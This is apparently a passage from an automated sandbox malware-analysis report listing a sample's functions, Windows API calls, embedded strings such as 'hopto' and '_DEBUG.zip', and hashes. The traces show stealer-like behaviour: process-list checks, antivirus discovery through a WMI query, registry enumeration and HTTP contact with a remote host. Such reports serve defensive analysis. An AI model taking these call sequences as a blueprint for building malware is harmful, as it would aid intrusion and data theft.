                                                                                                                                                                                            • Part of subcall function 00033198: strtok_s.MSVCRT ref: 000331B7
                                                                                                                                                                                            • Part of subcall function 00033198: strtok_s.MSVCRT ref: 0003323A
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00037A9A
                                                                                                                                                                                            • Part of subcall function 00025F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0002618E
                                                                                                                                                                                            • Part of subcall function 00025F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 000261D2
                                                                                                                                                                                            • Part of subcall function 00025F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00026200
                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0003858F), ref: 00037100
                                                                                                                                                                                            • Part of subcall function 0003257F: __EH_prolog3_catch_GS.LIBCMT ref: 00032589
                                                                                                                                                                                            • Part of subcall function 0003257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00037E31,.exe,00056CCC,00056CC8,00056CC4,00056CC0,00056CBC,00056CB8,00056CB4,00056CB0,00056CAC,00056CA8,00056CA4), ref: 000325A8
                                                                                                                                                                                            • Part of subcall function 0003257F: Process32First.KERNEL32(00000000,00000128), ref: 000325B8
                                                                                                                                                                                            • Part of subcall function 0003257F: Process32Next.KERNEL32(00000000,00000128), ref: 000325CA
                                                                                                                                                                                            • Part of subcall function 0003257F: StrCmpCA.SHLWAPI(?), ref: 000325DC
                                                                                                                                                                                            • Part of subcall function 0003257F: CloseHandle.KERNEL32(00000000), ref: 000325F0
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00038000
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • org, xrefs: 00037EE7
                                                                                                                                                                                          • esvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon.exe, xrefs: 000370D5, 000370EB
                                                                                                                                                                                          • _DEBUG.zip, xrefs: 00037F35
                                                                                                                                                                                          • cowod., xrefs: 00037E7B
                                                                                                                                                                                          • .exe, xrefs: 00037549
                                                                                                                                                                                          • http://, xrefs: 00037E57
                                                                                                                                                                                          • .exe, xrefs: 00037E04
                                                                                                                                                                                          • hopto, xrefs: 00037E9F
                                                                                                                                                                                          • 744fd163d6d4e0ac37e4032bcbfbb6af, xrefs: 0003770C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                                                                                          • String ID: .exe$.exe$744fd163d6d4e0ac37e4032bcbfbb6af$_DEBUG.zip$cowod.$esvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon.exe$hopto$http://$org
                                                                                                                                                                                          • API String ID: 305159127-4117912400
                                                                                                                                                                                          • Opcode ID: 99d2ec2cd0d9fdae22bc6150f03dae8a9fc5fd260b80452a229df69d8d7fe252
                                                                                                                                                                                          • Instruction ID: 9f7d77797738e7d6ec25c2075f9927372aa16630f12ecab156c073f891781504
                                                                                                                                                                                          • Opcode Fuzzy Hash: 99d2ec2cd0d9fdae22bc6150f03dae8a9fc5fd260b80452a229df69d8d7fe252
                                                                                                                                                                                          • Instruction Fuzzy Hash: DB923E325493559FCA21FF64D8436CEB7E8FF80300F814929F99867152DB71AA0E8B93
                                                                                                                                                                                          Function 000335A8 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • strtok_s.MSVCRT ref: 000335EA
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,true), ref: 000336AC
                                                                                                                                                                                            • Part of subcall function 00030549: lstrlenA.KERNEL32(?,?,00037174,000566CF,000566CE,?,?,?,?,0003858F), ref: 0003054F
                                                                                                                                                                                            • Part of subcall function 00030549: lstrcpyA.KERNEL32(00000000,00000000,?,00037174,000566CF,000566CE,?,?,?,?,0003858F), ref: 00030581
                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 0003376E
                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 0003379F
                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 000337DB
                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 00033817
                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 00033853
                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 0003388F
                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 000338CB
                                                                                                                                                                                          • strtok_s.MSVCRT ref: 0003398F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                                          • String ID: false$true
                                                                                                                                                                                          • API String ID: 2116072422-2658103896
                                                                                                                                                                                          • Opcode ID: d6d11bf3c20e5c439549a02f1ba520e0e1302be2f37d86616cab92b457cf4f2f
                                                                                                                                                                                          • Instruction ID: ce0129f565defbf35441ce0582b16b1bbd9768df6d30d8aa95a690d5c4401431
                                                                                                                                                                                          • Opcode Fuzzy Hash: d6d11bf3c20e5c439549a02f1ba520e0e1302be2f37d86616cab92b457cf4f2f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 62B11B75905128ABCF61EF54EC89ADA77B8BF18300F0141E5E949A7262EB709FC4CF50
                                                                                                                                                                                          Function 00025237 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 161networkmemoryfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AE8
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AEE
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AF4
                                                                                                                                                                                            • Part of subcall function 00024AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00024B06
                                                                                                                                                                                            • Part of subcall function 00024AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00024B0E
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0002527E
                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00025285
                                                                                                                                                                                          • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 000252A7
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 000252C1
                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000252F1
                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00025330
                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00025360
                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0002536B
                                                                                                                                                                                          • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00025394
                                                                                                                                                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 000253DA
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00025439
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00025445
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00025451
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                          • String ID: GET
                                                                                                                                                                                          • API String ID: 442264750-1805413626
                                                                                                                                                                                          • Opcode ID: f4a9af50ddd424c3f249150289ad8ce7c980e2464132cec997bf325231bebcbe
                                                                                                                                                                                          • Instruction ID: bdd3b9fa367a41f41da2fc2dc1824cbe7f6892f1cfdf62faf11b1b9ca63e8c9a
                                                                                                                                                                                          • Opcode Fuzzy Hash: f4a9af50ddd424c3f249150289ad8ce7c980e2464132cec997bf325231bebcbe
                                                                                                                                                                                          • Instruction Fuzzy Hash: F451077190092CAFDF21AF64EC89BEFBBB8EB08346F4101E5F909A6151D6705EC18F65
                                                                                                                                                                                          Function 00031997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0003199E
                                                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000000,00000030,00033F67,?,AV: ,000568C4,Install Date: ,000568B0,00000000,Windows: ,000568A0,Work Dir: In memory,00056888), ref: 000319AD
                                                                                                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000319BE
                                                                                                                                                                                          • CoCreateInstance.OLE32(00052F00,00000000,00000001,00052E30,?), ref: 000319D8
                                                                                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00031A0E
                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00031A5D
                                                                                                                                                                                            • Part of subcall function 00031D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00031A80,?), ref: 00031D4A
                                                                                                                                                                                            • Part of subcall function 00031D42: CharToOemW.USER32(?,00000000), ref: 00031D56
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00031A8B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                          • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                          • API String ID: 4288110179-315474579
                                                                                                                                                                                          • Opcode ID: 4e738acad40d0cba77ae55bf6a9bd5f547a5faf7a0a95efcb42d2c1d35153c85
                                                                                                                                                                                          • Instruction ID: 4c2b246b8ca8741f5d8c102e326abe1615b2fd076df18a9d2e3c04180e0b4da1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e738acad40d0cba77ae55bf6a9bd5f547a5faf7a0a95efcb42d2c1d35153c85
                                                                                                                                                                                          • Instruction Fuzzy Hash: DE316C70A04345BBDB21DB91DC49EEFBBBCEFC9B12F104619F611AB1A0C6759A40CB21
                                                                                                                                                                                          Function 00021284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 000212A7
                                                                                                                                                                                          • _memset.LIBCMT ref: 000212B6
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005A9EC), ref: 000212D0
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005A9F0), ref: 000212DE
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005A9F4), ref: 000212EC
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005A9F8), ref: 000212FA
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005A9FC), ref: 00021308
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005AA00), ref: 00021316
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005AA04), ref: 00021324
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005AA08), ref: 00021332
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005AA0C), ref: 00021340
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005AA10), ref: 0002134E
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005AA14), ref: 0002135C
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005AA18), ref: 0002136A
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005AA1C), ref: 00021378
                                                                                                                                                                                            • Part of subcall function 00030C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00021385), ref: 00030C91
                                                                                                                                                                                            • Part of subcall function 00030C85: HeapAlloc.KERNEL32(00000000,?,?,?,00021385), ref: 00030C98
                                                                                                                                                                                            • Part of subcall function 00030C85: GetComputerNameA.KERNEL32(00000000,00021385), ref: 00030CAC
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 000213E3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1553874529-0
                                                                                                                                                                                          • Opcode ID: f3c47409959acabb9972f75ac7148195a4c886e542849ed5a93eafe65b1900ab
                                                                                                                                                                                          • Instruction ID: 83e47f58cc5d08f6504252525770c66628059314c9e757e58cfee30f88e850d1
                                                                                                                                                                                          • Opcode Fuzzy Hash: f3c47409959acabb9972f75ac7148195a4c886e542849ed5a93eafe65b1900ab
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C4163B2E0423C66CB20DB709C59BDB7FAD9F25311F500691A998E7041D7749B88CB91
                                                                                                                                                                                          Function 00031203 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 155registrystringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0005670F,00000000,?,?), ref: 00031273
                                                                                                                                                                                          • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 000312B0
                                                                                                                                                                                          • wsprintfA.USER32 ref: 000312DD
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 000312FC
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00031332
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00031347
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00056E8C), ref: 000313DC
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00031446
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00031466
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00031472
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                                                          • String ID: - $%s\%s$?
                                                                                                                                                                                          • API String ID: 2394436309-3278919252
                                                                                                                                                                                          • Opcode ID: fec0862b1387fe4c956ce1e67ffeed99b880d35d54d3e8de9f35638d87552bc9
                                                                                                                                                                                          • Instruction ID: 525ab7cd864b67e9d3374e35b4e0876a8a9a8d6411fd5294a9baf8ae3c469dce
                                                                                                                                                                                          • Opcode Fuzzy Hash: fec0862b1387fe4c956ce1e67ffeed99b880d35d54d3e8de9f35638d87552bc9
                                                                                                                                                                                          • Instruction Fuzzy Hash: F761967590012CAAEF219B55ED85EDEB7BCEB49304F5142E5A609A3112DF30AEC9CF60
                                                                                                                                                                                          Function 00038271 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON
                                                                                                                                                                                          Download Yara Rule
